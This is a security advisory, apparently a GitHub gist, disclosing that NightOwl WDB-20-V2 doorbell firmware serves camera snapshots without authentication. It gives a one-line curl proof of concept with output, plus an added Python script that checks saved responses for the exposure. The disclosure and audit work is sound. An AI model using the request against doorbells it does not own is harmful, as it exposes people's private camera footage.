Created April 24, 2021 14:13
Gist: tj-oconnor/16a4116050bbcb4717315f519b944f1f
Description:
An issue exists in the NightOwl WDB-20-V2 Doorbell camera that allows an unauthenticated user to gain access to snapshots and video streams from the doorbell. The binary "app" running on firmware WDB-20-V2_20190314 offers a web server on port 80 that allows an unauthenticated user to take a snapshot from the doorbell camera via "http://<IP>/snapshot".
Affected Components:
Firmware: WDB-20-V2_20190314, binary: "app"
Further Information:
The binary "app" provides undocumented functionality on a webserver, including a "snapshot" function that enables unauthenticated users to take a snapshot of the camera.
https://cloud.binary.ninja/embed/f4400a22-c438-403a-bf2a-939ca44a4f6b
Proof of Concept:
$ curl http://<IP>/snapshot --output snapshot.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12442  100 12442    0     0  15191      0 --:--:-- --:--:-- --:--:-- 15173
$ file snapshot.jpg
snapshot.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3
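
Added example (not part of the original advisory and not vendor code): a check a device owner can run over a saved raw HTTP response from their own doorbell's /snapshot endpoint, to confirm whether it returned a real JPEG frame without any authentication challenge rather than an error or login page. The function names and the sample responses below are constructed for illustration.

```python
import struct

def jpeg_dimensions(body: bytes):
    """Return (width, height) from the first SOF segment, or None if not a JPEG."""
    if body[:3] != b"\xff\xd8\xff":              # SOI followed by a segment marker
        return None
    pos = 2
    while pos + 4 <= len(body):
        marker = body[pos + 1]
        if body[pos] != 0xFF or marker in (0xD9, 0xDA):
            return None                          # lost sync, or EOI/SOS before any SOF
        (seg_len,) = struct.unpack(">H", body[pos + 2:pos + 4])
        # SOF0..SOF15 hold the frame size; 0xC4, 0xC8 and 0xCC are not frame headers.
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
            if pos + 9 > len(body):
                return None
            height, width = struct.unpack(">HH", body[pos + 5:pos + 9])
            return width, height
        if seg_len < 2:
            return None                          # malformed segment length
        pos += 2 + seg_len
    return None

def audit_snapshot_response(raw: bytes) -> dict:
    """Classify a raw HTTP response (status line, headers, body) from /snapshot."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    dims = jpeg_dimensions(body)
    challenged = status in (401, 403) or "www-authenticate" in headers
    exposed = status == 200 and dims is not None and not challenged
    return {"status": status, "image": dims, "exposed": exposed}

# Constructed sample data: a minimal JFIF header plus a baseline SOF0 segment
# with the same properties `file` reports above (precision 8, 640x360, 3 components).
SAMPLE_JPEG = (b"\xff\xd8"
               b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               b"\xff\xc0\x00\x11\x08" + struct.pack(">HH", 360, 640) + b"\x03"
               + bytes(9) + b"\xff\xd9")
EXPOSED = b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n" + SAMPLE_JPEG
DENIED = b'HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm="cam"\r\n\r\n'
LOGIN_PAGE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>login</html>"

if __name__ == "__main__":
    for name, raw in (("exposed", EXPOSED), ("denied", DENIED), ("login", LOGIN_PAGE)):
        print(name, audit_snapshot_response(raw))
```

A raw response in this form can be saved with curl's `-i` option, which writes the response headers ahead of the body.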